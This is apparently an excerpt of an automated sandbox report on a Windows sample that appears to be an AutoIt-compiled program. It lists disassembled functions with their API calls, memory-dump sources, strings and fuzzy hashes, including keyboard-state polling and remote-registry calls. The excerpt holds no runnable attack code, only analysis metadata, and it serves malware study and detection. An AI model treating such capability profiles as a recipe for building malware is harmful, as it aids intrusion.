                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                            • __swprintf.LIBCMT ref: 00460915
                            • __swprintf.LIBCMT ref: 0046092D
                            • _wprintf.LIBCMT ref: 004609E1
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                            • API String ID: 3054410614-2561132961
                            • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                            • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                            • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                            • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                            Function 00458651 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                            • CLSIDFromString.OLE32(?,?), ref: 004587B3
                            • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                            • RegCloseKey.ADVAPI32(?), ref: 004587C5
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                            • API String ID: 600699880-22481851
                            • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                            • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                            • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                            • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                            Function 00450C41 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: DestroyWindow
                            • String ID: static
                            • API String ID: 3375834691-2160076837
                            • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                            • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                            • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                            • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                            Function 0045D94B Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 88COMMON
                            Download Yara Rule
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                            • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ErrorMode$DriveType
                            • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                            • API String ID: 2907320926-3566645568
                            • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                            • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                            • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                            • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                            Function 00470928 Relevance: 16.7, APIs: 11, Instructions: 166windowtimeCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                            • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                            • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                            • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                            • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                            • DeleteObject.GDI32(006D0000), ref: 00470A04
                            • DestroyIcon.USER32(00000070), ref: 00470A1C
                            • DeleteObject.GDI32(89250095), ref: 00470A34
                            • DestroyWindow.USER32(00610074), ref: 00470A4C
                            • DestroyIcon.USER32(?), ref: 00470A73
                            • DestroyIcon.USER32(?), ref: 00470A81
                            • KillTimer.USER32(00000000,00000000), ref: 00470B00
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                            • String ID:
                            • API String ID: 1237572874-0
                            • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                            • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                            • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                            • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                            Function 00479362 Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                            Download Yara Rule
                            APIs
                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                            • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                            • VariantInit.OLEAUT32(?), ref: 004793E1
                            • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                            • VariantCopy.OLEAUT32(?,?), ref: 00479461
                            • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                            • VariantClear.OLEAUT32(?), ref: 00479489
                            • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                            • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                            • VariantClear.OLEAUT32(?), ref: 004794CA
                            • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                            • String ID:
                            • API String ID: 2706829360-0
                            • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                            • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                            • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                            • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                            Function 004447E0 Relevance: 16.6, APIs: 11, Instructions: 130keyboardCOMMON
                            Download Yara Rule
                            APIs
                            • GetKeyboardState.USER32(?), ref: 0044480E
                            • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                            • GetKeyState.USER32(000000A0), ref: 004448AA
                            • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                            • GetKeyState.USER32(000000A1), ref: 004448D9
                            • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                            • GetKeyState.USER32(00000011), ref: 00444903
                            • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                            • GetKeyState.USER32(00000012), ref: 0044492D
                            • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                            • GetKeyState.USER32(0000005B), ref: 00444958
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: State$Async$Keyboard
                            • String ID:
                            • API String ID: 541375521-0
                            • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                            • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                            • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                            • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                            Function 00470B6C Relevance: 16.6, APIs: 11, Instructions: 125COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: InitVariant$_malloc_wcscpy_wcslen
                            • String ID:
                            • API String ID: 3413494760-0
                            • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                            • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                            • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                            • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                            Function 004542ED Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: AddressProc_free_malloc$_strcat_strlen
                            • String ID: AU3_FreeVar
                            • API String ID: 2634073740-771828931
                            • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                            • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                            • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                            • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                            Function 0046C5FA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 208comCOMMON
                            Download Yara Rule
                            APIs
                            • CoInitialize.OLE32 ref: 0046C63A
                            • CoUninitialize.OLE32 ref: 0046C645
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                              • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                            • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                            • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                            • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                            • IIDFromString.OLE32(?,?), ref: 0046C705
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                            • API String ID: 2294789929-1287834457
                            • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                            • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                            • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                            • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                            Function 004710F1 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                              • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                              • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                              • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                            • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                            • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                            • ImageList_EndDrag.COMCTL32 ref: 00471169
                            • ReleaseCapture.USER32 ref: 0047116F
                            • SetWindowTextW.USER32(?,00000000), ref: 00471206
                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                            • API String ID: 2483343779-2107944366
                            • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                            • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                            • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                            • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                            Function 004505F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                            • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                            • _wcslen.LIBCMT ref: 00450720
                            • _wcscat.LIBCMT ref: 00450733
                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                            • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: MessageSend$Window_wcscat_wcslen
                            • String ID: -----$SysListView32
                            • API String ID: 4008455318-3975388722
                            • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                            • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                            • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                            • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                            Function 00469BF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                            • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                            • GetParent.USER32 ref: 00469C98
                            • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                            • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                            • GetParent.USER32 ref: 00469CBC
                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: MessageSend$CtrlParent$_memmove_wcslen
                            • String ID: ComboBox$ListBox
                            • API String ID: 2360848162-1403004172
                            • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                            • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                            • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                            • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                            Function 0045DC4C Relevance: 15.2, APIs: 10, Instructions: 190COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                            • String ID:
                            • API String ID: 262282135-0
